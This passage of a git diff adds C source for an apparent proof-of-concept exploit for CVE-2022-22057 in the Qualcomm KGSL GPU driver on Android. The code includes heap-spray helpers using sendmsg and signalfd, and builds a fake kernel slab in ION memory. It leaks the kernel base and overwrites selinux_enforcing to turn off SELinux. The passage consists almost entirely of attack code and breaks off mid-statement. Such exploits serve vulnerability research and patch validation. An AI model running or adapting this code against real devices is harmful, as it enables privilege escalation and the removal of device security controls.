mhdr.msg_iovlen = 1; + + // the thread should inherit main thread cpumask, better be sure and redo-it! + migrate_to_cpu(rta->spray_cpu); + + // make it block + while (sendmsg(rta->send_fd, &mhdr, MSG_DONTWAIT) > 0) + ; + if (errno != EAGAIN) + { + perror("[-] sendmsg"); + goto fail; + } + + // use the ancillary data now + iov.iov_len = 16; + mhdr.msg_control = (void*)(rta->realloc_data); // use the ancillary data buffer + mhdr.msg_controllen = rta->object_size; + + g_nb_realloc_thread_ready++; + int batch_num = rta->batch_num; + + while (!g_realloc_now[batch_num]) // spinlock until the big GO! 
+ ; + // the next call should block while "reallocating" + if (sendmsg(rta->send_fd, &mhdr, 0) < 0) + { +// perror("[-] sendmsg"); + goto fail; + } + return NULL; + +fail: +// printf("[-] REALLOC THREAD FAILURE!!!\n"); + return NULL; +} + +int init_reallocation(struct realloc_thread_arg *rta, size_t nb_reallocs) +{ + int thread = 0; + int ret = -1; + + if (init_realloc_data(rta->realloc_data, rta->object_size, rta->level, rta->type)) + { + printf("[-] failed to initialize reallocation data!\n"); + goto fail; + } + printf("[+] reallocation data initialized!\n"); + + printf("[ ] initializing reallocation threads, please wait...\n"); + for (thread = 0; thread < nb_reallocs; ++thread) + { + if (init_unix_sockets(&rta[thread])) + { + printf("[-] failed to init UNIX sockets!\n"); + goto fail; + } + + if ((ret = pthread_create(&rta[thread].tid, NULL, realloc_thread, &rta[thread])) != 0) + { + perror("[-] pthread_create"); + goto fail; + } + } + + while (g_nb_realloc_thread_ready < nb_reallocs) + sched_yield(); + + printf("[+] %lu reallocation threads ready!\n", nb_reallocs); + + return 0; + +fail: + printf("[-] failed to initialize reallocation\n"); + return -1; +} + +void cleanup(struct realloc_thread_arg* rta) { + struct msghdr mhdr; + int size = 0; + while (size >= 0) { + if ((size = recvmsg(rta->recv_fd, &mhdr, MSG_DONTWAIT)) < 0) { + break; + } + } + close(rta->recv_fd); + close(rta->send_fd); +} + +void reset() { + for (int i = 0; i < sizeof(g_realloc_now)/sizeof(size_t); i++) { + g_realloc_now[i] = 0; + } + g_nb_realloc_thread_ready = 0; +} + +void realloc_NOW(int interval) +{ + for (int i = 0; i < sizeof(g_realloc_now)/sizeof(size_t); i++) { + g_realloc_now[i] = 1; + usleep(interval); + } + sched_yield(); // don't run me, run the reallocator threads! 
+ sleep(5); +} + diff --git a/SecurityExploits/Android/Qualcomm/CVE-2022-22057/sendmsg_spray.h b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/sendmsg_spray.h new file mode 100644 index 0000000..aa2c420 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/sendmsg_spray.h @@ -0,0 +1,32 @@ +#ifndef SENDMSG_SPRAY_H +#define SENDMSG_SPRAY_H +#include +#include +#include +#include + +#define MAX_SENDMSG_BATCH 6 + +struct realloc_thread_arg +{ + pthread_t tid; + int recv_fd; + int send_fd; + struct sockaddr_un addr; + char* realloc_data; + size_t object_size; + int spray_cpu; + int level; + int type; + int batch_num; +}; + +int init_reallocation(struct realloc_thread_arg *rta, size_t nb_reallocs); + +void reset(); + +void realloc_NOW(int); + +void cleanup(struct realloc_thread_arg* rta); + +#endif diff --git a/SecurityExploits/Android/Qualcomm/CVE-2022-22057/signalfd_spray.c b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/signalfd_spray.c new file mode 100644 index 0000000..3aaea67 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/signalfd_spray.c @@ -0,0 +1,69 @@ +#include +#include +#include +#include +#include +#include + +#include "cpu_utils.h" +#include "signalfd_spray.h" + +void spray_signalfd(uint64_t* mask, int num, int cpu, int* fds) { + if (migrate_to_cpu(cpu) == -1) { + return; + } + for (int i = 0; i < num; i++) { + int ret = signalfd(-1, (sigset_t*)mask, 0); + fds[i] = ret; + } +} + +uint64_t read_signalfd_mask(int fd) { + char buffer[100] = {0}; + int size = snprintf(buffer, 100, "/proc/self/fdinfo/%d", fd); + if (size < 0 || size >= 100) err(1, "read_signalfd_mask buffer too small\n"); + FILE* proc_fd = fopen(buffer, "r"); + if (proc_fd == NULL) { + err(1, "fail to open fdinfo\n"); + } + uint64_t x = 0x13371337; + while(fscanf(proc_fd, "%*s\t%lx\n", &x) == 1); + fclose(proc_fd); + return x; +} + +void spray_with_intervals(uint64_t interval, int count, int exclude_cpu_mask, uint64_t* mask, int* fds, int spray_size) { 
+ uint64_t offset = 0; + for (int i = 0; i < count; i++) { + for (int cpu = 0; cpu < CPU_RANGE; cpu++) { + if ((1 << cpu) & exclude_cpu_mask) { + offset += spray_size; + continue; + } + spray_signalfd(mask, spray_size, cpu, fds + offset); + offset += spray_size; + } + usleep(interval); + } +} + +int search_changed_mask(uint64_t expected, int* fds, uint64_t fd_size, uint64_t* new_mask) { + for (int i = 0; i < fd_size; i++) { + if (fds[i] == -1 || fds[i] == 0) continue; + uint64_t this_mask = read_signalfd_mask(fds[i]); + if (this_mask != expected) { + printf("mask %lx %d\n", this_mask, i); + *new_mask = this_mask; + return i; + } + } + return -1; +} + +void change_signalfd_mask(uint64_t* mask, int fd) { + if (fd == -1) err(1, "fd should not be -1\n"); + if (signalfd(fd, (sigset_t*)mask, 0) < 0) { + err(1, "Failed to change mask\n"); + } + +} diff --git a/SecurityExploits/Android/Qualcomm/CVE-2022-22057/signalfd_spray.h b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/signalfd_spray.h new file mode 100644 index 0000000..9caedb8 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/signalfd_spray.h @@ -0,0 +1,15 @@ +#ifndef SIGNALFD_SPRAY_H +#define SIGNALFD_SPRAY_H + +#define CPU_RANGE 7 + +void spray_signalfd(uint64_t* mask, int num, int cpu, int* fds); + +uint64_t read_signalfd_mask(int fd); + +void spray_with_intervals(uint64_t interval, int count, int exclude_cpu_mask, uint64_t* mask, int* fds, int spray_size); + +int search_changed_mask(uint64_t expected, int* fds, uint64_t fd_size, uint64_t* new_mask); + +void change_signalfd_mask(uint64_t* mask, int fd); +#endif diff --git a/SecurityExploits/Android/Qualcomm/CVE-2022-22057/timeline_wait.c b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/timeline_wait.c new file mode 100644 index 0000000..72ff49c --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/timeline_wait.c @@ -0,0 +1,799 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include 
+#include +#include +#include +#include + +#include "sendmsg_spray.h" +#include "kgsl_ioctl.h" +#include "signalfd_spray.h" +#include "cpu_utils.h" +#include "ion_utils.h" +#include "fake_obj_util.h" +#include "addr_utils.h" +#include "work_queue_utils.h" + +static volatile uint32_t timeline_id = 0; +static volatile uint32_t fd = 0; +static volatile uint32_t g_unlocked_read = 0; +static volatile uint32_t g_destroy_now = 0; +static volatile int pipe_write = 0; +static volatile int g_finished_read = 0; +static volatile int g_close_now = 0; +static volatile int g_signal_now = 0; +static volatile int g_free_spray_cpu = 0; +static volatile long wait_start_sec, wait_start_usec; + +static struct kgsl_timeline_val timelines[1]; + +#define SPRAY_CPU 0 + +#define DESTROY_CPU 1 + +#define POLL_CPU 4 + +#define SECOND_POLL_CPU 5 + +#define OBJECT_SIZE 128 + +#define NB_REALLOC_THREADS 40 + +#define NB_DELAY_THREADS 8 + +#define ENFORCING_OFF 0x32393d4 + +#define WAIT_QUEUE_HEAD_OFF 0x8 + +#define ION_HEAP_ID ION_USER_CONTIG_HEAP_ID + +#define SZ_1M (1024 * 1024) + +#define FAKE_REGION_SIZE (16 * SZ_1M) + +#define SIGFD_MASK ((~(1ul << 8)) & (~(1ul << 18))) + +#define SLAB_SIZE 96 + +#define SPRAY_INTERVAL 7500 + +#define PER_INTERVAL_SPRAY 8 + +#define CHAIN_SIZE (32 * 64) + +#define INTERVAL_COUNT (32) + +#define SIGFD1_SPRAY 16 + +#define BATCH_SIZE 10 + +#define SIGFD_SPRAY_NUM1 (NB_REALLOC_THREADS * SIGFD1_SPRAY) + +#define SIGFD_SPRAY_OVERFLOW 512 + +#define SIGFD_SPRAY_NUM2 (CPU_RANGE * PER_INTERVAL_SPRAY * INTERVAL_COUNT) + +#define SYNC_FILE_NUM 20000 + +#define ION_DMA_SIZE 1024 + +static int sigfds[SIGFD_SPRAY_NUM1 + SIGFD_SPRAY_OVERFLOW] = {-1}; + +static int sigfds2[SIGFD_SPRAY_NUM2] = {-1}; + +static int syncfds[SYNC_FILE_NUM] = {-1}; + +static char g_realloc_data[OBJECT_SIZE] = {0}; + +void* busy_loop(void* arg) { + migrate_to_cpu(DESTROY_CPU); + while (!g_finished_read); + return NULL; +} + +void* keep_spray_cpu_busy(void* arg) { + migrate_to_cpu(SPRAY_CPU); + 
while (!g_free_spray_cpu); + return NULL; +} + +void* read_pipe(void* arg) { + int buffer[80]; + pthread_t threads[NB_DELAY_THREADS]; + printf("readpipe start\n"); + migrate_to_cpu(DESTROY_CPU); + int fd = *((int*)arg); + read(fd, buffer, sizeof(buffer)); + g_unlocked_read = 1; + close(fd); + printf("readpipe\n"); + for (int i = 0; i < NB_DELAY_THREADS; i++) { + pthread_create(&threads[i], NULL, busy_loop, NULL); + } + while(!g_finished_read); + printf("readpipe finished\n"); + + return NULL; +} + +int create_timeline(int fd, int seqno) { + struct kgsl_timeline_create create_par = {0}; + create_par.seqno = seqno; + if (ioctl(fd, IOCTL_KGSL_TIMELINE_CREATE, &create_par) < 0) { + err(1, "Timeline create failed\n"); + } + return create_par.id; +} + +int timeline_fence_get(int fd, int seqno, int timeline) { + struct kgsl_timeline_fence_get fence_get_par = {0}; + fence_get_par.seqno = seqno; + fence_get_par.timeline = timeline; + if (ioctl(fd, IOCTL_KGSL_TIMELINE_FENCE_GET, &fence_get_par) < 0) { + err(1, "Timeline fence get failed\n"); + } + return fence_get_par.handle; +} + +void sig_func(int sig) +{ + printf("Caught signal: %d\n",sig); +} + +void* timeline_wait(void* arg) { + struct timeval wait_end; + long micros_used, secs_used, timelapsed; + migrate_to_cpu(SPRAY_CPU); + signal(SIGUSR1,sig_func); + printf("timeline_wait start\n"); + struct kgsl_timeline_wait wait_par = {0}; + wait_par.flags = KGSL_TIMELINE_WAIT_ANY; + wait_par.timelines = (uint64_t)(&timelines[0]); + wait_par.timelines_size = 16; + wait_par.count = 1; + wait_par.tv_sec = 0xffffffff; + printf(" wait complete %d\n", ioctl(fd, IOCTL_KGSL_TIMELINE_WAIT, &wait_par)); + usleep(120000); + realloc_NOW(20000); + sleep(20); + g_finished_read = 1; + return NULL; +} + +void* destroy(void* arg) { + struct timeval start, end; + long micros_used, secs_used, timelapsed; + migrate_to_cpu(DESTROY_CPU); + while (!g_destroy_now); + printf("destroy start\n"); + if (ioctl(fd, IOCTL_KGSL_TIMELINE_DESTROY, &timeline_id) < 
0) { + err(1, "destroy failed\n"); + } + printf("destroy finished\n"); + return NULL; +} + +void close_unused_fds(int* fds, size_t size, int exclude_index) { + for (int i = 0; i < size; i++) { + if (fds[i] == -1) continue; + if (i != exclude_index) { + close(fds[i]); + fds[i] = -1; + } + } +} + +void check_fence_space(uint64_t zero_region_vaddr, uint64_t region_vaddr, size_t slab_size) { + uint64_t new_mask = (~(region_vaddr)) & SIGFD_MASK; + uint64_t new_region_vaddr = ~new_mask; + if (new_region_vaddr + 128 * slab_size >= zero_region_vaddr) err(1, "Not enough space for slab\n"); +} + +void create_fake_slab(uint8_t* ion_region, int offset, size_t size, uint64_t region_vaddr) { + uint64_t* slab_start = (uint64_t*)(ion_region + offset); + uint64_t bin_size = 128/sizeof(uint64_t); + uint64_t idx = 0; + for (int i = 0; i < size; i++) { + if (i == size - 1) slab_start[idx] = 0; + slab_start[idx] = (region_vaddr + offset + (i + 1) * 128); + idx += bin_size; + } +} + +int spray_ion_buffer(int ion_fd, size_t num, int cpu_id, int* fds, uint64_t* flags) { + struct ion_allocation_data ion_alloc_data = {0}; + ion_alloc_data.len = 0x1000; + ion_alloc_data.heap_id_mask = ION_QSECOM_HEAP_ID; + + for (int i = 0; i < num; i++) { + ion_alloc_data.flags = flags[i]; + migrate_to_cpu(cpu_id); + if (ioctl(ion_fd, ION_IOC_ALLOC, &ion_alloc_data) < 0) { + return i; + } + fds[i] = ion_alloc_data.fd; + if ((i + 1) % 64 == 0) usleep(1000); + } + return num; +} + +int search_ion_buffer(uint8_t* slab_start, size_t slab_size, unsigned long* flags, int* found_dma, int* found_idx, size_t flag_size) { + uint8_t* curr = slab_start; + int ret = 0; + for (int i = 0; i < slab_size; i++) { + struct ion_buffer* this_buf = (struct ion_buffer*)curr; + for (int flag_idx = 0; flag_idx < flag_size; flag_idx++) { + if (this_buf->flags == flags[flag_idx]) { + found_dma[flag_idx] = 1; + found_idx[i] = 1; + ret++; + break; + } + } + curr+= 128; + } + return ret; +} + +uint64_t get_kernel_base(int ion_dma_fd, 
struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t heap_addr, uint64_t* heap_region) { + uint64_t phys_addr = virt_to_phys_lm(heap_addr); + uint64_t offset = phys_addr % 0x1000; + patch_ion_buffer(buffer, table_vaddr, table_region, phys_addr, 0x1000); + uint64_t len = 0x1000; + void* ion_region = mmap(NULL, len, PROT_READ|PROT_WRITE, MAP_SHARED, ion_dma_fd, 0); + if (ion_region == MAP_FAILED) { + err(1, "get_kernel_base map failed"); + } + uint64_t* addr_ptr = (uint64_t*)(ion_region + offset + ION_HEAP_OPS_OBJ_OFF); + *heap_region = (uint64_t)(ion_region + offset); + uint64_t heap_ops_addr = *addr_ptr; + if (heap_ops_addr == 0) { + printf("addr_ptr %p heap_region %p phys_addr %lx\n", addr_ptr, ion_region + offset, phys_addr); + return 0; + } + uint64_t kernel_base = heap_ops_addr - ION_HEAP_OPS_OFF - KERNEL_PHYS_OFF; + printf("heap_ops %lx, kernel base: %lx\n", heap_ops_addr, kernel_base); + return kernel_base; +} + +int set_enforcing(int ion_dma_fd, struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t kernel_base, uint64_t* enforcing_region) { + uint64_t phys_addr = kernel_base + ENFORCING_OFF; + uint64_t offset = phys_addr % 0x1000; + patch_ion_buffer(buffer, table_vaddr, table_region, phys_addr, 0x1000); + uint64_t len = 0x1000; + void* ion_region = mmap(NULL, len, PROT_READ|PROT_WRITE, MAP_SHARED, ion_dma_fd, 0); + if (ion_region == MAP_FAILED) { + printf("set_enforcing map failed"); + return -1; + } + *enforcing_region = (uint64_t)(ion_region + offset); + uint8_t* enforcing_ptr = (uint8_t*)(ion_region + offset); + enforcing_ptr[0] = 0; + printf("set enforcing to permissive\n"); + char result = '2'; + sleep(1); + int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY); + read(enforce_fd, &result, 1); + close(enforce_fd); + if (result == '0') { + printf("[+] successfully overwritten selinux_enforcing\n"); + } else { + printf("[-] Failed to overwrite selinux_enforcing\n"); + return -1; + } + return 0; 
+} + +void repair_heap(uint64_t ion_heap, uint64_t ion_heap_vaddr, int* ion_dma_fds, uint64_t* ion_dma_regions, size_t dma_buf_size) { + uint64_t* freelist = (uint64_t*)(ion_heap + ION_HEAP_FREELIST_OFF); + freelist[0] = ion_heap_vaddr + ION_HEAP_FREELIST_OFF; + freelist[1] = ion_heap_vaddr + ION_HEAP_FREELIST_OFF; + uint64_t* wait_queue_head = (uint64_t*)(ion_heap + ION_HEAP_WAITQUEUE_OFF + WAIT_QUEUE_HEAD_OFF); + wait_queue_head[0] = ion_heap_vaddr + ION_HEAP_WAITQUEUE_OFF + WAIT_QUEUE_HEAD_OFF; + wait_queue_head[1] = ion_heap_vaddr + ION_HEAP_WAITQUEUE_OFF + WAIT_QUEUE_HEAD_OFF; + + uint64_t* flags = (uint64_t*)(ion_heap + ION_HEAP_FLAGS_OFF); + flags[0] |= ION_HEAP_FLAG_DEFER_FREE; + printf("freeing ion dma fd\n"); + for (int i = 0; i < dma_buf_size; i++) { + close(ion_dma_fds[i]); + if (ion_dma_regions[i] != 0) { + munmap((void*)page_align(ion_dma_regions[i]), 0x1000); + } + } + freelist[0] = ion_heap_vaddr + ION_HEAP_FREELIST_OFF; + freelist[1] = ion_heap_vaddr + ION_HEAP_FREELIST_OFF; + printf("finished freeing ion dma fd\n"); +} + +int get_ion_dma_fd(int* found_dma, int* ion_dma_fds, int skip, int size) { + struct ion_buffer* ion_buf = NULL; + int remain_skip = skip; + for (int i = 0; i < size; i++) { + if (found_dma[i] != 0) { + if (remain_skip == 0) { + return ion_dma_fds[i]; + } + remain_skip--; + } + } + return -1; +} + +struct ion_buffer* get_ion_buffer(int* found_idx, uint8_t* region_ptr, int skip, int size) { + int remain_skip = skip; + for (int i = 0; i < size; i++) { + if (found_idx[i] != 0) { + if (remain_skip == 0) { + return (struct ion_buffer*)(region_ptr + i * 128); + } + remain_skip--; + } + } + return NULL; +} + +int assign_batch_num(int thread_num) { + int num_per_batch = NB_REALLOC_THREADS/MAX_SENDMSG_BATCH; + int remainder = NB_REALLOC_THREADS % MAX_SENDMSG_BATCH; + int extra_threshold = (num_per_batch + 1) * remainder; + if (thread_num < extra_threshold) { + return thread_num/(num_per_batch + 1); + } + return (thread_num - 
extra_threshold)/num_per_batch + remainder; +} + +int main() { + setbuf(stdout, NULL); + setbuf(stderr, NULL); + pthread_t thread1, thread2, thread3; + + int kgsl_fd; + struct realloc_thread_arg rta[NB_REALLOC_THREADS]; + + int exclude_cpu = check_cpu_affinity(); + int poll_cpu = exclude_cpu != POLL_CPU ? POLL_CPU : SECOND_POLL_CPU; + + migrate_to_cpu(3); + + kgsl_fd = open("/dev/kgsl-3d0", 0); + if (kgsl_fd == -1) { + err(1, "cannot open kgsl\n"); + } + fd = kgsl_fd; + + int ion_fd = open("/dev/ion", 0); + if (ion_fd == -1) err(1, "cannot open ion\n"); + + timeline_id = create_timeline(fd, 0); + + struct kgsl_timeline_val val = {0}; + val.timeline = timeline_id; + val.seqno = 10; + timelines[0] = val; + + for (int i = 0; i < SYNC_FILE_NUM; i++) { + syncfds[i] = timeline_fence_get(fd, 10, timeline_id); + } + + for (int i = 0; i < OBJECT_SIZE; i++) { + g_realloc_data[i] = i; + } + + struct dma_fence* fence = (struct dma_fence*)(&(g_realloc_data[0])); + fence->flags = 1; + fence->refcount = 1; + + size_t heap_size = ion_heap_size(ION_HEAP_ID); + if (heap_size < FAKE_REGION_SIZE) err(1, "heap_size smaller than FAKE_REGION_SIZE %lu\n", heap_size); + heap_size = FAKE_REGION_SIZE; + if (heap_size % 0x1000 != 0) err(1, "heap_size not page aligned\n"); + uint8_t* ion_region = (uint8_t*)spray_ion_heap(ION_HEAP_ID, heap_size); + if (ion_region == NULL) err(1, "Out of memory in reserved pool.\n"); + + uint64_t region_vaddr = ion_heap_phys_addr(ION_HEAP_ID) - PHYS_TO_VIRT_OFF; + + region_vaddr += (ion_heap_size(ION_HEAP_ID) - FAKE_REGION_SIZE)/2; + uint64_t fence_off = fill_ion_heap(ion_region, CHAIN_SIZE, heap_size, region_vaddr); + uint64_t fence_kstart = region_vaddr + fence_off; + uint64_t zero_region_vaddr = fence_kstart - ZERO_FILL_SZ; + + printf("region start addr: %lx\n", region_vaddr); + printf("fence kernel addr: %lx %d\n", fence_kstart, ion_region[fence_off + (CHAIN_SIZE - 1)* 128 + 0x8]); + + check_fence_space(zero_region_vaddr, SLAB_SIZE, region_vaddr); + uint64_t 
new_mask = (~(region_vaddr)) & SIGFD_MASK; + uint64_t region_offset = ~(new_mask) - region_vaddr; + create_fake_slab(ion_region, region_offset, SLAB_SIZE, region_vaddr); + printf("created fake slab at %lx\n", ~new_mask); + + struct kgsl_timeline_fence* tfence = (struct kgsl_timeline_fence*)(&(g_realloc_data[0])); + tfence->node.next = fence_kstart + NODE_OFF; + memset(rta, 0, sizeof(rta)); + for (int i = 0; i < NB_REALLOC_THREADS; i++) { + rta[i].realloc_data = &(g_realloc_data[0]); + rta[i].object_size = OBJECT_SIZE; + rta[i].spray_cpu = SPRAY_CPU; + rta[i].level = (uint32_t)((zero_region_vaddr << 32) >> 32); + rta[i].type = (uint32_t)(zero_region_vaddr >> 32); + rta[i].batch_num = assign_batch_num(i); + } + + uint64_t cb_list = 0; + void* fence_start = ion_region + fence_off; + uint64_t mask2 = 0x4041; + uint64_t per_interval_spray = PER_INTERVAL_SPRAY; + + if (init_reallocation(rta, NB_REALLOC_THREADS)) { + err(1, "[-] failed to initialize reallocation!\n"); + } + + pthread_create(&thread1, NULL, destroy, NULL); + struct sched_param sched_par = {0}; + + if (pthread_setschedparam(thread1, SCHED_IDLE, &sched_par) != 0) { + err(1, "[-] set priority for trigger failed\n"); + } + + int pipe_fd[2]; + pipe(pipe_fd); + + pthread_t rw_tid; + if (pthread_create(&rw_tid, NULL, read_pipe, &(pipe_fd[0])) != 0) { + err(1, "[-] pthread_create read"); + } + pipe_write = pipe_fd[1]; + struct sched_param sched_par2 = {0}; + + if (pthread_setschedparam(rw_tid, SCHED_NORMAL, &sched_par2) != 0) { + err(1, "[-] set priority for rw failed\n"); + } + + pthread_create(&thread2, NULL, timeline_wait, NULL); + sleep(5); + struct timeval wait_start; + char write_char; + write_char = 'a'; + gettimeofday(&wait_start, NULL); + wait_start_sec = wait_start.tv_sec; + wait_start_usec = wait_start.tv_usec; + + g_destroy_now = 1; + usleep(1000); + pthread_kill(thread2, SIGUSR1); + write(pipe_write, &write_char, 1); + migrate_to_cpu(poll_cpu); + while (cb_list == 0) { + cb_list = 
poll_list_addr(fence_start, CHAIN_SIZE, fence_kstart); + } + spray_with_intervals(SPRAY_INTERVAL, INTERVAL_COUNT, (1 << DESTROY_CPU), &mask2, &(sigfds2[0]), per_interval_spray); + printf("cb_list %lx temp %lx\n", cb_list, cb_list + STACK_OFFSET); + + uint64_t mask1 = 0x52424242; + uint64_t offset = 0; + int spray_size = SIGFD1_SPRAY; + + sleep(1); + int batch_size = BATCH_SIZE; + int batch_num = NB_REALLOC_THREADS/batch_size; + if (NB_REALLOC_THREADS % batch_size) batch_num++; + int index2 = -1; + for (int batch = 0; batch < batch_num; batch++) { + int sprayed = 0; + for (int sprayed_num = 0; sprayed_num < batch_size; sprayed_num++) { + migrate_to_cpu(SPRAY_CPU); + if (sprayed_num + batch * batch_size >= NB_REALLOC_THREADS) break; + cleanup(&(rta[sprayed_num + batch * batch_size])); + sprayed++; + } + spray_signalfd(&mask1, spray_size * sprayed, SPRAY_CPU, &(sigfds[offset])); + offset += spray_size * sprayed; + index2 = search_changed_mask(mask2, &(sigfds2[0]), SIGFD_SPRAY_NUM2, &new_mask); + if (index2 != -1) { + break; + } + } + if (index2 == -1) { + err(1, "Failed to replace sigfds2 mask.\n"); + } + //Fail to replace free'd sendmsg object, try to spray more on other cpu + if (new_mask != mask1) { + int batch_size = SIGFD_SPRAY_OVERFLOW/(CPU_RANGE - 1); + for (int cpu = 0; cpu < CPU_RANGE; cpu++) { + if (cpu == SPRAY_CPU) continue; + spray_signalfd(&mask1, batch_size, cpu, &(sigfds[offset])); + index2 = search_changed_mask(mask2, &(sigfds2[0]), SIGFD_SPRAY_NUM2, &new_mask); + offset += batch_size; + if (new_mask == mask1) { + printf("Replaced sendmsg on cpu %d\n", cpu); + break; + } + } + if (new_mask != mask1) { + err(1, "failed to replace sendmsg object.\n"); + } + } + + int cpu_count = CPU_RANGE; + int cpu_id = (index2 % (cpu_count * per_interval_spray)) / per_interval_spray; + + printf("cpu_id %d\n", cpu_id); + printf("interval number %lu\n", index2/(cpu_count * per_interval_spray)); + uint64_t addr_mask = ~region_vaddr; + change_signalfd_mask(&addr_mask, 
sigfds2[index2]); + int index1 = search_changed_mask(mask1, &(sigfds[0]), sizeof(sigfds)/sizeof(int), &new_mask); + if (index1 == -1) { + err(1, "failed to replace sigfds mask.\n"); + } + printf("thread number %d %d %d\n", index1/spray_size, index1 % spray_size, sigfds[index1]); + printf("thread batch number %d\n", assign_batch_num(index1/spray_size)); + + printf("new mask %lx %lx\n", new_mask, ~(new_mask)); + + int ion_dma_fds[ION_DMA_SIZE] = {-1}; + uint64_t ion_dma_regions[ION_DMA_SIZE] = {0}; + uint64_t flags[ION_DMA_SIZE]; + int found_dma[ION_DMA_SIZE] = {0}; + int found_idx[SLAB_SIZE] = {0}; + int off = 0; + printf("region_offset %lx\n", region_offset); + uint8_t* region_ptr = (uint8_t*)(ion_region + region_offset); + for (int i = 0; i < ION_DMA_SIZE; i++) { + flags[i] = 0x4141 + i; + } + sleep(1); + migrate_to_cpu(cpu_id); + close(sigfds2[index2]); + change_signalfd_mask(&addr_mask, sigfds[index1]); + + int found = 0; + int spray_num = spray_ion_buffer(ion_fd, ION_DMA_SIZE, cpu_id, &(ion_dma_fds[0]), &(flags[0])); + printf("sprayed %d ion buffer\n", spray_num); + printf("start searching for buffer\n"); + found = search_ion_buffer(region_ptr, SLAB_SIZE, &(flags[0]), &(found_dma[0]), &(found_idx[0]), ION_DMA_SIZE); + if (found != 0) { + printf("Found %d ion regions\n", found); + } + + //Try other cpu + if (found == 0) { + for (int cpu = 0; cpu < CPU_RANGE; cpu++) { + if (cpu == cpu_id) continue; + spray_num = spray_ion_buffer(ion_fd, ION_DMA_SIZE, cpu_id, &(ion_dma_fds[0]), &(flags[0])); + printf("Retry start searching for buffer on cpu %d\n", cpu); + found = search_ion_buffer(region_ptr, SLAB_SIZE, &(flags[0]), &(found_dma[0]), &(found_idx[0]), ION_DMA_SIZE); + if (found != 0) { + printf("Found %d ion regions on cpu %d\n", found, cpu); + break; + } + } + } + + if (found == 0) { + addr_mask = 0; + change_signalfd_mask(&addr_mask, sigfds[index1]); + err(1, "Failed to find ion buffer\n"); + } + + uint64_t table_vaddr = region_vaddr + region_offset + SLAB_SIZE * 
128; + uint8_t* table_region = (uint8_t*)(region_ptr + SLAB_SIZE * 128); + uint64_t ion_heap = 0; + uint64_t enforcing_region = 0; + + int ion_dma_fd = get_ion_dma_fd(&(found_dma[0]), &(ion_dma_fds[0]), 0, ION_DMA_SIZE); + struct ion_buffer* ion_buf = get_ion_buffer(&(found_idx[0]), region_ptr, 0, SLAB_SIZE); + uint64_t ion_heap_vaddr = (uint64_t)(ion_buf->heap); + + uint64_t kernel_base = 0; + int skip = 0; + for (int i = 0; i < 3; i++) { + kernel_base = get_kernel_base(ion_dma_fd, ion_buf, table_vaddr, table_region, (uint64_t)(ion_buf->heap), &ion_heap); + if (kernel_base) break; + table_vaddr += 2 * 128; + table_region += 2 * 128; + skip++; + sleep(1); + ion_dma_fd = get_ion_dma_fd(&(found_dma[0]), &(ion_dma_fds[0]), skip, ION_DMA_SIZE); + if (ion_dma_fd == -1) break; + ion_buf = get_ion_buffer(&(found_idx[0]), region_ptr, skip, SLAB_SIZE); + } + if (!kernel_base) { + repair_heap(ion_heap, ion_heap_vaddr, &(ion_dma_fds[0]), &(ion_dma_regions[0]), ION_DMA_SIZE); + err(1, "Failed to get kernel base\n"); + } + + skip++; + ion_dma_fd = get_ion_dma_fd(&(found_dma[0]), ion_dma_fds, skip, ION_DMA_SIZE); + if (ion_dma_fd == -1) { + repair_heap(ion_heap, ion_heap_vaddr, &(ion_dma_fds[0]), &(ion_dma_regions[0]), ION_DMA_SIZE); + err(1, "Failed to ion_dma_fd for enforcing\n"); + } + ion_buf = get_ion_buffer(&(found_idx[0]), region_ptr, skip, SLAB_SIZE); + + table_vaddr += 2 * 128; + table_region += 2 * 128; + skip++; + + int enforced = 0; + for (int i = 0; i < 3; i++) { + enforced = set_enforcing(ion_dma_fd, ion_buf, table_vaddr, table_region, kernel_base, &enforcing_region); + table_vaddr += 2 * 128; + table_region += 2 * 128; + skip++; + if (enforced == 0) break; + munmap((void*)page_align(enforcing_region), 0x1000); + ion_dma_fd = get_ion_dma_fd(&(found_dma[0]), ion_dma_fds, skip, ION_DMA_SIZE); + if (ion_dma_fd == -1) break; + ion_buf = get_ion_buffer(&(found_idx[0]), region_ptr, skip, SLAB_SIZE); + } + if (enforced == -1) { + repair_heap(ion_heap, ion_heap_vaddr, 
&(ion_dma_fds[0]), &(ion_dma_regions[0]), ION_DMA_SIZE); + err(1, "Failed to set enforcing\n"); + } + + ion_dma_regions[0] = enforcing_region; + uint64_t kernel_shift = kernel_base - KERNEL_PBASE; + uint64_t wq_ptr_addr = KGSL_MEMQUEUE_OFF + KERNEL_VBASE + kernel_shift; + + int wq_ptr_fd = get_ion_dma_fd(&(found_dma[0]), ion_dma_fds, skip, ION_DMA_SIZE); + if (wq_ptr_fd == -1) { + repair_heap(ion_heap, ion_heap_vaddr, &(ion_dma_fds[0]), &(ion_dma_regions[0]), ION_DMA_SIZE); + err(1, "Failed to find ion region for wq_ptr_fd\n"); + } + struct ion_buffer* wq_ptr_buf = get_ion_buffer(&(found_idx[0]), region_ptr, skip, SLAB_SIZE); + + table_vaddr += 2 * 128; + table_region += 2 * 128; + skip++; + + uint64_t wq_addr = 0; + for (int i = 0; i < 3; i++) { + wq_addr = get_wq_addr(wq_ptr_fd, wq_ptr_buf, table_vaddr, table_region, wq_ptr_addr); + if (wq_addr != 0) { + break; + } + table_vaddr += 2 * 128; + table_region += 2 * 128; + skip++; + wq_ptr_fd = get_ion_dma_fd(&(found_dma[0]), ion_dma_fds, skip, ION_DMA_SIZE); + if (wq_ptr_fd == -1) { + repair_heap(ion_heap, ion_heap_vaddr, &(ion_dma_fds[0]), &(ion_dma_regions[0]), ION_DMA_SIZE); + err(1, "Failed to find ion region for wq_ptr_fd\n"); + } + wq_ptr_buf = get_ion_buffer(&(found_idx[0]), region_ptr, skip, SLAB_SIZE); + } + + if (wq_addr == 0) { + repair_heap(ion_heap, ion_heap_vaddr, &(ion_dma_fds[0]), &(ion_dma_regions[0]), 